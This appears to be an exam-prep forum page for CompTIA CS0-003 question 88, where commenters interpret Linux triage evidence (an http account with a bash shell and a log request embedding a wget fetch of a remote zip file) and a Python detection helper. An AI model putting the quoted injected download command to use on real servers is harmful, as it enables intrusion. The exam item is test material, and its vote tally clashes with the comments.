
Exam CS0-003 topic 1 question 88 discussion

Actual exam question from CompTIA's CS0-003
Question #: 88
Topic #: 1

An incident response team member is triaging a Linux server. The output is shown below:



Which of the following is the adversary most likely trying to do?

  • A. Create a backdoor root account named zsh.
  • B. Execute commands through an unsecured service account.
  • C. Send a beacon to a command-and-control server.
  • D. Perform a denial-of-service attack on the web server.
Suggested Answer: B 🗳️

Comments

kmordalv
Highly Voted 1 year, 9 months ago
Selected Answer: B
Looking at the output I see that it is running container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) Of the options proposed, it seems that option B is the most logical answer.
upvoted 20 times
Wole_excel
Highly Voted 10 months, 2 weeks ago
Based on the provided output: /etc/passwd: The http account has a /bin/bash shell assigned instead of the usual /usr/bin/nologin or /bin/false. This suggests that the adversary has potentially modified the http service account to allow for command execution, which typically wouldn't be possible with a service account. /var/log/httpd: The logs indicate an error related to parsing a request and references a suspicious URL (http://grohl.ve.da/tmp/brkgtr.zip). This suggests that the adversary attempted to exploit a vulnerability in the web application (likely a file upload or remote code execution vulnerability) to download and potentially execute a malicious file. Given this information: The adversary is most likely trying to execute commands through an unsecured service account (B). The modification of the http account to use /bin/bash indicates an attempt to gain shell access using that account, which could be leveraged for further exploitation. The log entries also suggest an attempt to download and possibly execute malicious files through the compromised web server.
upvoted 8 times
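A small triage helper built on the two indicators this answer walks through (a service account whose login shell is interactive, and a request-parsing error line that carries a download command). It is an added example, not from the exam or this site; the passwd and log lines it scans are constructed, and example.invalid stands in for the URL in the screenshot.

```python
import re
from urllib.parse import unquote

# Constructed /etc/passwd excerpt (not the screenshot); only "http" is suspicious.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
http:x:33:33:http:/srv/http:/bin/bash
nobody:x:65534:65534:nobody:/:/usr/bin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/zsh
"""

# Constructed httpd error-log lines; example.invalid replaces the real URL.
SAMPLE_HTTPD_LOG = """[error] [client 203.0.113.7] Error parsing request: GET /index.php?cmd=;#wget%20http://example.invalid/tmp/payload.zip;#whoami HTTP/1.1
[error] [client 198.51.100.9] File does not exist: /srv/http/favicon.ico
[notice] Apache/2.4 configured -- resuming normal operations
"""

# Shells that refuse interactive logins; anything else on a service account is notable.
NON_INTERACTIVE = {"/usr/bin/nologin", "/usr/sbin/nologin", "/sbin/nologin",
                   "/bin/false", "/bin/sync"}
SYSTEM_UID_MAX = 999  # assumption: UIDs below 1000 are system/service accounts

def find_service_accounts_with_shell(passwd_text):
    """Return service accounts (UID <= SYSTEM_UID_MAX, not root) with an interactive shell."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, _, uid, _, _, _, shell = fields
        if name == "root" or not uid.isdigit():
            continue
        if int(uid) <= SYSTEM_UID_MAX and shell not in NON_INTERACTIVE:
            findings.append({"user": name, "uid": int(uid), "shell": shell})
    return findings

# A fetch tool followed by a URL; the URL ends at whitespace, ';', or a quote.
FETCH_RE = re.compile(r"\b(?:wget|curl)\s+(https?://[^\s;\"']+)", re.IGNORECASE)

def find_download_attempts(log_text):
    """Percent-decode each log line and return URLs passed to wget/curl inside requests."""
    urls = []
    for line in log_text.splitlines():
        match = FETCH_RE.search(unquote(line))
        if match:
            urls.append(match.group(1))
    return urls
```

Both functions return structured findings so the same checks can be run over a real /etc/passwd and error_log on a triaged host; a hit in both is the combination this answer describes.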
thisguyfucks
Most Recent 9 months, 2 weeks ago
Selected Answer: B
I'm thinking B
upvoted 1 times
a3432e2
11 months, 1 week ago
Selected Answer: B
It is B, There is no indication in the provided logs or user account information that a backdoor root account named zsh is being created. The /etc/passwd file does not show a user with such a name or hint towards such an action. This option seems less likely based on the information given. Normally, service accounts like http (associated with the HTTP service) should have minimal permissions and use restrictive shells like /usr/bin/nologin. The presence of a shell like /bin/bash may allow an attacker to execute commands if they manage to exploit the service.
upvoted 5 times
LB54
11 months, 2 weeks ago
Selected Answer: A
Based on the provided image, the adversary is most likely trying to create a backdoor root account named zsh (Option A). This conclusion is drawn from the presence of a user account named ‘zsh’ with root privileges in the /etc/passwd file, which is a common tactic used by attackers to maintain persistent access to a compromised system.
upvoted 1 times
Koekjesdoos_111
8 months ago
That's a file... not the username
upvoted 1 times
thisguyfucks
1 year, 3 months ago
Selected Answer: B
I'm thinking B here.
upvoted 2 times
Community vote distribution
A (35%)
C (25%)
B (20%)
Other